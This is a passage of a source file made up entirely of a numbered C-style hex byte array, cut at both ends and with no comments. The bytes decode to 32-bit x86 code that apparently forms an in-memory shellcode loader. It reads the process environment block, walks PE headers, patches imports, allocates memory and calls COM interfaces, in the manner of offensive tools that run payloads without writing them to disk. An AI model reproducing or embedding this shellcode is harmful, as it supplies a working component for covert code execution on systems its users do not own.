1161 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xe1, 0x02, 0x00, 0x00, 0x8b,
1162 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x84, 0xa3, 0x00, 0x00,
1163 0x00, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x2c, 0xc7, 0x44, 0x24, 0x28,
1164 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x24, 0x00, 0x00, 0x00, 0x00,
1165 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c,
1166 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x18, 0x00, 0x00, 0x00, 0x00,
1167 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x70, 0xff,
1168 0xff, 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0xff, 0xff,
1169 0xff, 0xff, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
1170 0x24, 0x04, 0xff, 0xff, 0x1f, 0x00, 0x8d, 0x85, 0x40, 0xfe, 0xff, 0xff,
1171 0x89, 0x04, 0x24, 0xe8, 0x30, 0x24, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83,
1172 0x7d, 0x90, 0x00, 0x78, 0x69, 0x8b, 0x85, 0x40, 0xfe, 0xff, 0xff, 0x8b,
1173 0x55, 0xb4, 0x89, 0x54, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
1174 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04,
1175 0x24, 0xe8, 0x45, 0x23, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90,
1176 0x00, 0x79, 0x3b, 0xe9, 0xee, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x44, 0xff,
1177 0xff, 0xff, 0x18, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x44, 0xff, 0xff, 0xff,
1178 0x64, 0x8b, 0x00, 0x89, 0x85, 0x40, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x40,
1179 0xff, 0xff, 0xff, 0x8b, 0x40, 0x30, 0x89, 0x04, 0x24, 0x8b, 0x85, 0x70,
1180 0xff, 0xff, 0xff, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xeb, 0x04, 0x90, 0xeb,
1181 0x01, 0x90, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
1182 0xaa, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x00, 0x00,
1183 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24,
1184 0x0c, 0x00, 0x80, 0x00, 0x00, 0x8d, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x89,
1185 0x44, 0x24, 0x08, 0x8d, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24,
1186 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x26, 0x23, 0x00,
1187 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x78, 0x64, 0x8b, 0x85,
1188 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24, 0x08, 0x89,
1189 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x40,
1190 0x22, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x78, 0x41,
1191 0x8b, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24,
1192 0x04, 0x89, 0x04, 0x24, 0xe8, 0x5b, 0x22, 0x00, 0x00, 0xeb, 0x2b, 0x90,
1193 0xeb, 0x28, 0x90, 0xeb, 0x25, 0x90, 0xeb, 0x22, 0x90, 0xeb, 0x1f, 0x90,
1194 0xeb, 0x1c, 0x90, 0xeb, 0x19, 0x90, 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90,
1195 0xeb, 0x10, 0x90, 0xeb, 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90,
1196 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90, 0x8d, 0x65, 0xf4, 0x5b, 0x5e, 0x5f,
1197 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x81, 0xec, 0xa8, 0x00, 0x00, 0x00, 0x8b,
1198 0x45, 0x08, 0x05, 0x44, 0x04, 0x00, 0x00, 0x89, 0x45, 0xf4, 0xc7, 0x45,
1199 0xf0, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55, 0xf0, 0x8b, 0x45,
1200 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x70, 0xff, 0xff, 0xff,
1201 0x8b, 0x55, 0xf0, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xf0, 0x01, 0x8b,
1202 0x55, 0xf0, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1203 0x74, 0x15, 0x8b, 0x55, 0xf0, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6,
1204 0x00, 0x3c, 0x3b, 0x74, 0x06, 0x83, 0x7d, 0xf0, 0x7f, 0x7e, 0xc0, 0x83,
1205 0x7d, 0xf0, 0x00, 0x74, 0x37, 0x8b, 0x45, 0xf0, 0x83, 0xc0, 0x01, 0x01,
1206 0x45, 0xf4, 0x8d, 0x95, 0x70, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xf0, 0x01,
1207 0xd0, 0xc6, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x8d,
1208 0x85, 0x70, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xe3, 0x1c, 0x00,
1209 0x00, 0x85, 0xc0, 0x75, 0x81, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x06,
1210 0x90, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83,
1211 0xec, 0x58, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b,
1212 0x80, 0xf8, 0x01, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0x0c, 0x00,
1213 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x71, 0x8b, 0x45, 0xf4,
1214 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00,
1215 0xc7, 0x44, 0x24, 0x10, 0x1c, 0x00, 0x00, 0x00, 0x8d, 0x45, 0xd4, 0x89,
1216 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8b,
1217 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff,
1218 0xff, 0xe8, 0xe3, 0x21, 0x00, 0x00, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0,
1219 0x00, 0x79, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x45,
1220 0xe4, 0x3d, 0x00, 0x10, 0x00, 0x00, 0x75, 0x19, 0x8b, 0x45, 0xec, 0x3d,
1221 0x00, 0x00, 0x02, 0x00, 0x75, 0x0f, 0x8b, 0x45, 0xe8, 0x83, 0xf8, 0x04,
1222 0x75, 0x07, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x00, 0x00,
1223 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x81, 0xec, 0x08, 0x01, 0x00,
1224 0x00, 0xc7, 0x45, 0xcc, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x94, 0x18,
1225 0x00, 0x00, 0x00, 0x8b, 0x45, 0x94, 0x64, 0x8b, 0x00, 0x89, 0x45, 0x90,
1226 0x8b, 0x45, 0x90, 0x8b, 0x40, 0x30, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0xc8,
1227 0x8b, 0x40, 0x10, 0x89, 0x45, 0xc4, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x38,
1228 0x8b, 0x55, 0x08, 0x81, 0xc2, 0x1c, 0x03, 0x00, 0x00, 0x89, 0x14, 0x24,
1229 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xc0, 0x8b, 0x45, 0xc0, 0x89,
1230 0x45, 0xbc, 0x8b, 0x45, 0xbc, 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45,
1231 0xc0, 0x01, 0xd0, 0x89, 0x45, 0xb8, 0x8b, 0x45, 0xb8, 0x8d, 0x50, 0x18,
1232 0x8b, 0x45, 0xb8, 0x0f, 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xc0, 0x01, 0xd0,
1233 0x89, 0x45, 0xb4, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x66,
1234 0x8b, 0x55, 0xf4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0,
1235 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45,
1236 0x08, 0x05, 0x14, 0x03, 0x00, 0x00, 0x8b, 0x00, 0x39, 0xc2, 0x75, 0x3e,
1237 0x8b, 0x55, 0xf4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0,
1238 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x50, 0x0c, 0x8b,
1239 0x45, 0xc0, 0x01, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x55, 0xf4, 0x89, 0xd0,
1240 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0xc2, 0x8b, 0x45,
1241 0xb4, 0x01, 0xd0, 0x8b, 0x40, 0x08, 0xc1, 0xe8, 0x02, 0x89, 0x45, 0xf0,
1242 0xeb, 0x13, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xb8, 0x0f, 0xb7, 0x40,
1243 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x45, 0xf4, 0x72, 0x8b, 0x8b, 0x45, 0x08,
1244 0x8b, 0x40, 0x68, 0xff, 0xd0, 0x89, 0x45, 0xb0, 0xc7, 0x45, 0xf4, 0x00,
1245 0x00, 0x00, 0x00, 0xeb, 0x3f, 0x8b, 0x45, 0xf4, 0x8d, 0x14, 0x85, 0x00,
1246 0x00, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x89, 0x45, 0xe8, 0x8b,
1247 0x45, 0xe8, 0x8b, 0x40, 0x04, 0x39, 0x45, 0xb0, 0x75, 0x1d, 0x8b, 0x45,
1248 0x08, 0x8b, 0x80, 0xfc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x89, 0x54,
1249 0x24, 0x04, 0x8b, 0x55, 0xe8, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
1250 0x08, 0xeb, 0x0d, 0x90, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b,
1251 0x45, 0xf0, 0x72, 0xb9, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x64, 0xff, 0xd0,
1252 0x89, 0x45, 0xac, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x6d,
1253 0x8b, 0x45, 0xf4, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
1254 0xec, 0x01, 0xd0, 0x89, 0x45, 0xa8, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x04,
1255 0x39, 0x45, 0xac, 0x75, 0x4b, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xec, 0x00,
1256 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x55,
1257 0xe8, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x55, 0x88, 0x89, 0x14, 0x24, 0xff,
1258 0xd0, 0x83, 0xec, 0x0c, 0x8b, 0x45, 0xf4, 0x8d, 0x14, 0x85, 0x00, 0x00,
1259 0x00, 0x00, 0x8b, 0x45, 0xec, 0x01, 0xc2, 0xc7, 0x44, 0x24, 0x08, 0x08,
1260 0x00, 0x00, 0x00, 0x8d, 0x45, 0x88, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14,
1261 0x24, 0xe8, 0x50, 0x19, 0x00, 0x00, 0xeb, 0x0d, 0x90, 0x83, 0x45, 0xf4,
1262 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xf0, 0x72, 0x8b, 0x8b, 0x45, 0xc8,
1263 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xa4, 0x8b, 0x45, 0xa4, 0x8b, 0x40, 0x0c,
1264 0x89, 0x45, 0xe4, 0xe9, 0x95, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x05,
1265 0x44, 0x03, 0x00, 0x00, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xd0, 0x01, 0x00,
1266 0x00, 0x00, 0xc7, 0x45, 0xd4, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4,
1267 0x00, 0x00, 0x00, 0x00, 0xeb, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4,
1268 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x77, 0x75, 0x07, 0xc7, 0x45, 0xd0,
1269 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
1270 0x0f, 0xb6, 0x00, 0x3c, 0x70, 0x75, 0x07, 0xc7, 0x45, 0xd4, 0x01, 0x00,
1271 0x00, 0x00, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6,
1272 0x00, 0x8d, 0x8d, 0x08, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xf4, 0x01, 0xca,
1273 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4,
1274 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x15, 0x8b, 0x55, 0xd8,
1275 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x3b, 0x74, 0x06,
1276 0x83, 0x7d, 0xf4, 0x7f, 0x76, 0x94, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x84,
1277 0xf4, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x01, 0x01, 0x45,
1278 0xd8, 0x8d, 0x95, 0x08, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
1279 0xc6, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x40, 0x18, 0xc7, 0x44, 0x24,
1280 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x08, 0xff, 0xff, 0xff, 0x89,
1281 0x54, 0x24, 0x08, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04,
1282 0x24, 0xe8, 0x29, 0xcf, 0xff, 0xff, 0x89, 0x45, 0xa0, 0x83, 0x7d, 0xa0,
1283 0x00, 0x0f, 0x84, 0xa3, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xd0, 0x00, 0x74,
1284 0x4d, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xd4, 0x00, 0x74,
1285 0x0e, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0x98, 0x8b, 0x45, 0x98, 0xff, 0xd0,
1286 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x0f, 0x84, 0xfe, 0xfe, 0xff,
1287 0xff, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45,
1288 0x08, 0x89, 0x04, 0x24, 0xe8, 0x57, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f,
1289 0x84, 0xe2, 0xfe, 0xff, 0xff, 0x8b, 0x55, 0x8c, 0x8b, 0x45, 0xe0, 0x89,
1290 0x10, 0xe9, 0xd5, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0xdc,
1291 0x83, 0x7d, 0xd4, 0x00, 0x74, 0x0e, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0x9c,
1292 0x8b, 0x45, 0x9c, 0xff, 0xd0, 0x89, 0x45, 0xdc, 0x83, 0x7d, 0xdc, 0x00,
1293 0x0f, 0x84, 0xb1, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xdc, 0x8b, 0x00, 0x89,
1294 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x0a, 0xfc,
1295 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0x95, 0xfe, 0xff, 0xff, 0x8b, 0x45,
1296 0xe8, 0x8b, 0x50, 0x04, 0x8b, 0x45, 0xdc, 0x89, 0x10, 0xe9, 0x85, 0xfe,
1297 0xff, 0xff, 0x90, 0xe9, 0x7f, 0xfe, 0xff, 0xff, 0x90, 0x8b, 0x45, 0xe4,
1298 0x8b, 0x00, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x8b, 0x40, 0x18, 0x85,
1299 0xc0, 0x0f, 0x85, 0x5d, 0xfe, 0xff, 0xff, 0xb8, 0x01, 0x00, 0x00, 0x00,
1300 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x81, 0xec, 0x44, 0x03, 0x00, 0x00,
1301 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8,
1302 0x01, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x2c,
1303 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x83, 0xc0, 0x01,
1304 0x83, 0xd2, 0x00, 0x01, 0xc0, 0x89, 0x85, 0xec, 0xfc, 0xff, 0xff, 0x8b,
1305 0x45, 0xf4, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00,
1306 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30, 0x00, 0x00, 0x8d, 0x85,
1307 0xec, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
1308 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x89, 0x44,
1309 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x46, 0x1d,
1310 0x00, 0x00, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0x3d,
1311 0x03, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x48, 0x8b, 0x55, 0x0c,
1312 0x8b, 0x92, 0x24, 0x05, 0x00, 0x00, 0x01, 0xd2, 0x89, 0xd3, 0x8b, 0x95,
1313 0xf4, 0xfe, 0xff, 0xff, 0x8b, 0x4d, 0x0c, 0x81, 0xc1, 0x28, 0x05, 0x00,
1314 0x00, 0x89, 0x5c, 0x24, 0x14, 0x89, 0x54, 0x24, 0x10, 0xc7, 0x44, 0x24,
1315 0x0c, 0xff, 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44, 0x24,
1316 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00,
1317 0xff, 0xd0, 0x83, 0xec, 0x18, 0x8d, 0x45, 0x84, 0x89, 0x45, 0xb0, 0x8d,
1318 0x45, 0xb0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
1319 0xe8, 0xe1, 0x02, 0x00, 0x00, 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x89,
1320 0x45, 0xb8, 0x8d, 0x45, 0xb0, 0x83, 0xc0, 0x08, 0x89, 0x44, 0x24, 0x04,
1321 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xc5, 0x06, 0x00, 0x00, 0x8d,
1322 0x85, 0xf8, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xc4, 0x8d, 0x45, 0xb0, 0x83,
1323 0xc0, 0x14, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
1324 0xe8, 0x43, 0x08, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xd8, 0x00,
1325 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04,
1326 0x24, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45,
1327 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x07, 0x02, 0x00, 0x00, 0x8b,
1328 0x45, 0x08, 0x8b, 0x80, 0xdc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8d,
1329 0x9a, 0xa4, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8d, 0x8a, 0x84, 0x08,
1330 0x00, 0x00, 0x8d, 0x55, 0xe0, 0x89, 0x54, 0x24, 0x10, 0x89, 0x5c, 0x24,
1331 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x03, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
1332 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x0c, 0x24, 0xff, 0xd0, 0x83, 0xec,
1333 0x14, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0xbc, 0x01,
1334 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x8b, 0x00, 0x8b, 0x55, 0x08,
1335 0x8d, 0x9a, 0xd4, 0x08, 0x00, 0x00, 0x8b, 0x55, 0xe0, 0x8d, 0x4d, 0xe4,
1336 0x89, 0x4c, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff,
1337 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f,
1338 0x85, 0x63, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x8b, 0x40,
1339 0x0c, 0x8b, 0x55, 0xe4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
1340 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x30, 0x01, 0x00,
1341 0x00, 0x8b, 0x45, 0xe0, 0x89, 0x45, 0xd0, 0x8b, 0x45, 0xe0, 0x8b, 0x00,
1342 0x8b, 0x40, 0x0c, 0x8b, 0x55, 0xe0, 0x8d, 0x4d, 0xb0, 0x89, 0x4c, 0x24,
1343 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xec,
1344 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x03, 0x01, 0x00, 0x00, 0x8b, 0x45,
1345 0x08, 0x8d, 0x90, 0xe5, 0x05, 0x00, 0x00, 0x8d, 0x85, 0xf2, 0xfc, 0xff,
1346 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08,
1347 0x89, 0x04, 0x24, 0xe8, 0x07, 0xcb, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b,
1348 0x80, 0x9c, 0x00, 0x00, 0x00, 0x8d, 0x95, 0xf2, 0xfc, 0xff, 0xff, 0x89,
1349 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xe8, 0x8b, 0x45,
1350 0xe0, 0x8b, 0x00, 0x8b, 0x40, 0x20, 0x8b, 0x55, 0xe0, 0xc7, 0x44, 0x24,
1351 0x08, 0x02, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0xe8, 0x89, 0x4c, 0x24, 0x04,
1352 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xec, 0x8b,
1353 0x45, 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe8, 0x89,
1354 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x83, 0x7d, 0xec, 0x00, 0x0f,
1355 0x85, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x8b, 0x40,
1356 0x14, 0x8b, 0x8d, 0xf4, 0xfe, 0xff, 0xff, 0x8b, 0x55, 0xe4, 0xc7, 0x44,
1357 0x24, 0x24, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
1358 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
1359 0x24, 0x18, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00,
1360 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
1361 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
1362 0x00, 0x00, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1363 0xec, 0x28, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x1e, 0x8b,
1364 0x45, 0xe0, 0x8b, 0x00, 0x8b, 0x40, 0x14, 0x8b, 0x55, 0xe0, 0xc7, 0x44,
1365 0x24, 0x04, 0x02, 0x00, 0x00, 0x00, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1366 0xec, 0x08, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x8b, 0x40,
1367 0x08, 0x8b, 0x55, 0xe4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
1368 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x8b, 0x40, 0x1c, 0x8b, 0x55, 0xe0, 0x89,
1369 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0xe0, 0x8b, 0x00,
1370 0x8b, 0x40, 0x08, 0x8b, 0x55, 0xe0, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1371 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x2c, 0x0d, 0x00, 0x00, 0x8b,
1372 0x80, 0x28, 0x0d, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x83, 0xd2, 0x00, 0x8d,
1373 0x14, 0x00, 0x8b, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08,
1374 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xe8,
1375 0xcc, 0x13, 0x00, 0x00, 0xc7, 0x85, 0xec, 0xfc, 0xff, 0xff, 0x00, 0x00,
1376 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24,
1377 0x0c, 0x00, 0x80, 0x00, 0x00, 0x8d, 0x85, 0xec, 0xfc, 0xff, 0xff, 0x89,
1378 0x44, 0x24, 0x08, 0x8d, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x89, 0x44, 0x24,
1379 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x1a, 0x1a, 0x00,
1380 0x00, 0x89, 0x45, 0xf0, 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89,
1381 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xf4, 0xe8, 0x61,
1382 0x10, 0x00, 0x00, 0xba, 0xec, 0x51, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40,
1383 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x10,
1384 0xe8, 0x47, 0x10, 0x00, 0x00, 0xba, 0xcf, 0x52, 0x40, 0x00, 0xb9, 0x14,
